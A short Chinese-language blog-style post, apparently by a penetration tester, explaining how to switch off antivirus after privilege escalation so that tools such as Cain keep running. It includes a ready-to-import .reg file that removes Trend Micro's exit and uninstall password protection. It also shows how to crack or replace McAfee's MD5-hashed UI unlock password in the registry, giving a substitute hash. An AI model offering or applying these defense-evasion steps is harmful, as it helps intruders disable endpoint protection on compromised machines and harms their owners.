最近测试一个项目,提权时遇到了杀毒软件,N多工具都被杀掉了,虽然最后都成功提权了,但是还是或多或少的给我们提权造成了不少的麻烦,尤其是提权成功后使用cain嗅探,cain被秒杀,别提多郁闷了。这里就我提权过程中遇到的两款杀毒软件来进行一下总结,总结一下如何在提权成功后关掉这两款杀毒软件。
1、免密码关掉趋势杀毒软件
Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\TrendMicro\PC-cillinNTCorp\CurrentVersion\Misc.] "NoPwdProtect"=dword:00000001 "Allow Uninstall"=dword:00000001 ;其中【"NoPwdProtect"=dword:00000001】为退出趋势,改为【0】即可恢复,推出密码 ;其中【"Allow Uninstall"=dword:00000001】为卸载趋势,改为【0】即可恢复,卸载密码
将以上内容保存为waitalone.reg,然后双击导入即可免密码退出趋势杀毒软件。
2、破解McAfee杀毒软件密码
McAfee杀毒软件的用户界面解锁密码保存于以下注册表路径:
HKEY_LOCAL_MACHINE\SOFTWARE\McAfee\DesktopProtection
其实子键UIP就是杀毒软件用户界面解锁密码,是md5密文,大家直接在cmd5上面解密即可,如果解不出来的话就自己生成一个替换即可。
---------------------------------------------------------------------------------------
McAfee VirusScan控制台的用户解锁密码忘记了可以采取以下办法解决:
重启电脑,进入安全模式,然后打开注册表,在注册表中找到HKEY_LOCAL_MACHINE\SOFTWARE\McAfee\DesktopProtection ,再找到UIP子键,删除该子键,重启即可。
或
装了麦咖啡8.5i,密码忘记了 没法解锁,看网上说的是 安全模式下删除HKEY_LOCAL_MACHINE\SOFTWARE\McAfee\DesktopProtection\UIP
咱没那个条件,就想办法修改原先的 换成个已知的
admin:19a2854144b63a8f7617a6f225019b12
如果禁止修改 试试冰刃吧,还不行,打电话给机房重装系统.